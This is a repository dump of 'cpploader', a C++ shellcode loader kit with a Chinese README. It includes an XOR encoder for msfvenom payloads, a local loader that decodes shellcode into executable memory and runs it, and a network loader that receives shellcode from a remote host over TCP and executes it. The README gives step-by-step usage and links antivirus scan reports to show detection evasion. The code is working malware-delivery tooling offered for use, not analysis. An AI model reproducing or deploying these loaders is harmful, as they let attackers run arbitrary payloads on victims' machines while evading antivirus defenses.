├── README.md ├── cppencoder ├── cppencoder.cpp ├── cppencoder.vcxproj ├── cppencoder.vcxproj.filters └── cppencoder.vcxproj.user ├── cpploader.sln ├── cpploader ├── cpploader.cpp ├── cpploader.vcxproj ├── cpploader.vcxproj.filters └── cpploader.vcxproj.user └── cppnetloader ├── cppnetloader.cpp ├── cppnetloader.vcxproj ├── cppnetloader.vcxproj.filters └── cppnetloader.vcxproj.user /README.md: -------------------------------------------------------------------------------- 1 | # cpploader 2 | 3 | shellcode 内存加载器 C++编写. 4 | 5 | ## usage 6 | 7 | 生成 payload 8 | 9 | ``` 10 | msfvenom -p windows/exec CMD=calc.exe -f raw -o calc.bin 11 | ``` 12 | 13 | 加密 payload (默认 xor) 14 | 15 | ``` 16 | cppencoder.exe calc.bin enc.bin 17 | ``` 18 | 19 | `cpploader` 本地执行. 20 | 21 | ``` 22 | cpploader.exe enc.bin 23 | ``` 24 | 25 | `cppnerloader` 网络执行. 26 | 27 | ``` 28 | cppnetloader.exe 192.168.1.1 5555 29 | ``` 30 | 31 | ## report 32 | 33 | 在线杀软扫描报告. 34 | 35 | `cpploader` 36 | 37 | [VirScan](http://r.virscan.org/language/zh-cn/report/d968bcfa2e2d9e1e29bf45c95c51f60f) 38 | 39 | [VirusTotal](https://www.virustotal.com/gui/file/a56d0da8784f1ec01c354e7a0cfd2d004b36b509c266d344b25b2c5e7d458066/detection) 40 | 41 | `cppnetloader` 42 | 43 | [VirScan](http://r.virscan.org/language/zh-cn/report/092783011de845c8595b0d1ce5b56b8e) 44 | 45 | [VirusTotal](https://www.virustotal.com/gui/file/992011c67059117a832b3e6cf7c16226046d42673f72d90cbf28aa18ab5a0ee5/detection) 46 | 47 | # other 48 | 49 | [C++ ShellCode 加载器](https://exp10it.cn/2019/08/c-shellcode-%E5%8A%A0%E8%BD%BD%E5%99%A8/) 50 | 51 | 编码/加密方式可自行发挥. 52 | 53 | 更改 vs 编译选项缩小体积. 54 | 55 | 自己写效果更好. 56 | 57 | 58 | -------------------------------------------------------------------------------- /cppencoder/cppencoder.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | void encode(LPCSTR inFilename, LPCSTR outFilename) 5 | { 6 | char buf[4096]; 7 | HANDLE inFile = CreateFile(inFilename, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); 8 | int size = GetFileSize(inFile, NULL); 9 | DWORD bytesRead = 0; 10 | ReadFile(inFile, buf, size, &bytesRead, NULL); 11 | CloseHandle(inFile); 12 | for (int i = 0; i != sizeof(buf) / sizeof(buf[0]); i++) { 13 | buf[i] = buf[i] ^ 'a'; 14 | } 15 | HANDLE outFile = CreateFile(outFilename, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL); 16 | DWORD bytesWrite = 0; 17 | WriteFile(outFile, buf, size, &bytesWrite, NULL); 18 | CloseHandle(outFile); 19 | } 20 | 21 | int main(int argc, char** argv) { 22 | if (argc != 3) { 23 | std::cout << "cppencoder.exe calc.bin enc.bin" << std::endl; 24 | } 25 | else { 26 | encode(argv[1], argv[2]); 27 | } 28 | return 0; 29 | } -------------------------------------------------------------------------------- /cppencoder/cppencoder.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | {993DBEA1-D711-47A5-AA8A-5800A6DFA283} 24 | Win32Proj 25 | cppencoder 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | MultiByte 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | MultiByte 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | false 75 | 76 | 77 | true 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | 88 | 89 | Level3 90 | MinSpace 91 | true 92 | true 93 | true 94 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 95 | true 96 | MultiThreadedDLL 97 | Sync 98 | 99 | 100 | Console 101 | true 102 | true 103 | true 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | Level3 113 | Disabled 114 | true 115 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 116 | true 117 | 118 | 119 | Console 120 | true 121 | 122 | 123 | 124 | 125 | 126 | 127 | Level3 128 | Disabled 129 | true 130 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 131 | true 132 | 133 | 134 | Console 135 | true 136 | 137 | 138 | 139 | 140 | 141 | 142 | Level3 143 | MinSpace 144 | true 145 | true 146 | true 147 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 148 | true 149 | MultiThreadedDLL 150 | Sync 151 | 152 | 153 | Console 154 | true 155 | true 156 | true 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | -------------------------------------------------------------------------------- /cppencoder/cppencoder.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 源文件 20 | 21 | 22 | -------------------------------------------------------------------------------- /cppencoder/cppencoder.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /cpploader.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29123.88 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cpploader", "cpploader\cpploader.vcxproj", "{705C4B3E-BE7C-4414-9372-9FB2D636DBC8}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cppencoder", "cppencoder\cppencoder.vcxproj", "{993DBEA1-D711-47A5-AA8A-5800A6DFA283}" 9 | EndProject 10 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cppnetloader", "cppnetloader\cppnetloader.vcxproj", "{D2CDC2D3-4BA5-4D53-B219-6BEDAC4A2855}" 11 | EndProject 12 | Global 13 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 14 | Debug|x64 = Debug|x64 15 | Debug|x86 = Debug|x86 16 | Release|x64 = Release|x64 17 | Release|x86 = Release|x86 18 | EndGlobalSection 19 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 20 | {705C4B3E-BE7C-4414-9372-9FB2D636DBC8}.Debug|x64.ActiveCfg = Debug|x64 21 | {705C4B3E-BE7C-4414-9372-9FB2D636DBC8}.Debug|x64.Build.0 = Debug|x64 22 | {705C4B3E-BE7C-4414-9372-9FB2D636DBC8}.Debug|x86.ActiveCfg = Debug|Win32 23 | {705C4B3E-BE7C-4414-9372-9FB2D636DBC8}.Debug|x86.Build.0 = Debug|Win32 24 | {705C4B3E-BE7C-4414-9372-9FB2D636DBC8}.Release|x64.ActiveCfg = Release|x64 25 | {705C4B3E-BE7C-4414-9372-9FB2D636DBC8}.Release|x64.Build.0 = Release|x64 26 | {705C4B3E-BE7C-4414-9372-9FB2D636DBC8}.Release|x86.ActiveCfg = Release|Win32 27 | {705C4B3E-BE7C-4414-9372-9FB2D636DBC8}.Release|x86.Build.0 = Release|Win32 28 | {993DBEA1-D711-47A5-AA8A-5800A6DFA283}.Debug|x64.ActiveCfg = Debug|x64 29 | {993DBEA1-D711-47A5-AA8A-5800A6DFA283}.Debug|x64.Build.0 = Debug|x64 30 | {993DBEA1-D711-47A5-AA8A-5800A6DFA283}.Debug|x86.ActiveCfg = Debug|Win32 31 | {993DBEA1-D711-47A5-AA8A-5800A6DFA283}.Debug|x86.Build.0 = Debug|Win32 32 | {993DBEA1-D711-47A5-AA8A-5800A6DFA283}.Release|x64.ActiveCfg = Release|x64 33 | {993DBEA1-D711-47A5-AA8A-5800A6DFA283}.Release|x64.Build.0 = Release|x64 34 | {993DBEA1-D711-47A5-AA8A-5800A6DFA283}.Release|x86.ActiveCfg = Release|Win32 35 | {993DBEA1-D711-47A5-AA8A-5800A6DFA283}.Release|x86.Build.0 = Release|Win32 36 | {D2CDC2D3-4BA5-4D53-B219-6BEDAC4A2855}.Debug|x64.ActiveCfg = Debug|x64 37 | {D2CDC2D3-4BA5-4D53-B219-6BEDAC4A2855}.Debug|x64.Build.0 = Debug|x64 38 | {D2CDC2D3-4BA5-4D53-B219-6BEDAC4A2855}.Debug|x86.ActiveCfg = Debug|Win32 39 | {D2CDC2D3-4BA5-4D53-B219-6BEDAC4A2855}.Debug|x86.Build.0 = Debug|Win32 40 | {D2CDC2D3-4BA5-4D53-B219-6BEDAC4A2855}.Release|x64.ActiveCfg = Release|x64 41 | {D2CDC2D3-4BA5-4D53-B219-6BEDAC4A2855}.Release|x64.Build.0 = Release|x64 42 | {D2CDC2D3-4BA5-4D53-B219-6BEDAC4A2855}.Release|x86.ActiveCfg = Release|Win32 43 | {D2CDC2D3-4BA5-4D53-B219-6BEDAC4A2855}.Release|x86.Build.0 = Release|Win32 44 | EndGlobalSection 45 | GlobalSection(SolutionProperties) = preSolution 46 | HideSolutionNode = FALSE 47 | EndGlobalSection 48 | GlobalSection(ExtensibilityGlobals) = postSolution 49 | SolutionGuid = {7E2D591C-72B4-4A1E-9301-032BD51715B9} 50 | EndGlobalSection 51 | EndGlobal 52 | -------------------------------------------------------------------------------- /cpploader/cpploader.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #pragma comment(linker, "/INCREMENTAL:NO") 5 | 6 | void shellcode(LPCSTR inFilename) 7 | { 8 | char buf[4096]; 9 | HANDLE inFile = CreateFile(inFilename, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); 10 | int size = GetFileSize(inFile, NULL); 11 | DWORD bytesRead = 0; 12 | ReadFile(inFile, buf, size, &bytesRead, NULL); 13 | for (int i = 0; i != sizeof(buf) / sizeof(buf[0]); i++) { 14 | buf[i] = buf[i] ^ 'a'; 15 | } 16 | LPVOID Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 17 | memcpy(Memory, buf, sizeof(buf)); 18 | ((void(*)())Memory)(); 19 | } 20 | 21 | int main(int argc, char** argv) { 22 | if (argc != 2) { 23 | std::cout << "cpploader.exe enc.bin" << std::endl; 24 | } 25 | else { 26 | shellcode(argv[1]); 27 | } 28 | return 0; 29 | } -------------------------------------------------------------------------------- /cpploader/cpploader.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | {705C4B3E-BE7C-4414-9372-9FB2D636DBC8} 24 | Win32Proj 25 | cpploader 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | MultiByte 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | MultiByte 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | 88 | 89 | Level3 90 | Disabled 91 | true 92 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 93 | true 94 | 95 | 96 | Console 97 | true 98 | 99 | 100 | 101 | 102 | 103 | 104 | Level3 105 | Disabled 106 | true 107 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 108 | true 109 | 110 | 111 | Console 112 | true 113 | 114 | 115 | 116 | 117 | 118 | 119 | Level3 120 | MinSpace 121 | true 122 | true 123 | true 124 | 125 | 126 | true 127 | MultiThreadedDLL 128 | Sync 129 | 130 | 131 | Console 132 | true 133 | true 134 | true 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | Level3 144 | MinSpace 145 | true 146 | true 147 | true 148 | 149 | 150 | true 151 | MultiThreadedDLL 152 | Sync 153 | 154 | 155 | Console 156 | true 157 | true 158 | true 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | -------------------------------------------------------------------------------- /cpploader/cpploader.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 源文件 20 | 21 | 22 | -------------------------------------------------------------------------------- /cpploader/cpploader.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /cppnetloader/cppnetloader.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #pragma comment(lib, "ws2_32.lib") 7 | #pragma comment(linker, "/INCREMENTAL:NO") 8 | 9 | int shellcode(PCSTR host, u_short port) 10 | { 11 | char buf[4096]; 12 | WORD version = MAKEWORD(2, 2); 13 | WSADATA data; 14 | WSAStartup(version, &data); 15 | SOCKET sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 16 | sockaddr_in addr; 17 | addr.sin_family = AF_INET; 18 | addr.sin_port = htons(port); 19 | inet_pton(AF_INET, host, & addr.sin_addr); 20 | connect(sock, (sockaddr*)& addr, sizeof(addr)); 21 | recv(sock, buf, 4096, NULL); 22 | closesocket(sock); 23 | WSACleanup(); 24 | for (int i = 0; i != sizeof(buf) / sizeof(buf[0]); i++) { 25 | buf[i] = buf[i] ^ 'a'; 26 | } 27 | LPVOID Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 28 | memcpy(Memory, buf, sizeof(buf)); 29 | ((void(*)())Memory)(); 30 | return 0; 31 | } 32 | 33 | int main(int argc, char** argv) { 34 | if (argc != 3) { 35 | std::cout << "cpploader.exe 192.168.1.1 5555" << std::endl; 36 | } 37 | else { 38 | shellcode(argv[1], atoi(argv[2])); 39 | } 40 | return 0; 41 | } -------------------------------------------------------------------------------- /cppnetloader/cppnetloader.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | {D2CDC2D3-4BA5-4D53-B219-6BEDAC4A2855} 24 | Win32Proj 25 | cppnetloader 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | MultiByte 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | MultiByte 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | false 75 | 76 | 77 | true 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | 88 | 89 | Level3 90 | MaxSpeed 91 | true 92 | true 93 | true 94 | _WINSOCK_DEPRECATED_NO_WARNINGS 95 | true 96 | 97 | 98 | Console 99 | true 100 | true 101 | true 102 | 103 | 104 | 105 | 106 | 107 | 108 | Level3 109 | Disabled 110 | true 111 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 112 | true 113 | 114 | 115 | Console 116 | true 117 | 118 | 119 | 120 | 121 | 122 | 123 | Level3 124 | Disabled 125 | true 126 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 127 | true 128 | 129 | 130 | Console 131 | true 132 | 133 | 134 | 135 | 136 | 137 | 138 | Level3 139 | MaxSpeed 140 | true 141 | true 142 | true 143 | _WINSOCK_DEPRECATED_NO_WARNINGS 144 | true 145 | 146 | 147 | Console 148 | true 149 | true 150 | true 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | -------------------------------------------------------------------------------- /cppnetloader/cppnetloader.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 源文件 20 | 21 | 22 | -------------------------------------------------------------------------------- /cppnetloader/cppnetloader.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | --------------------------------------------------------------------------------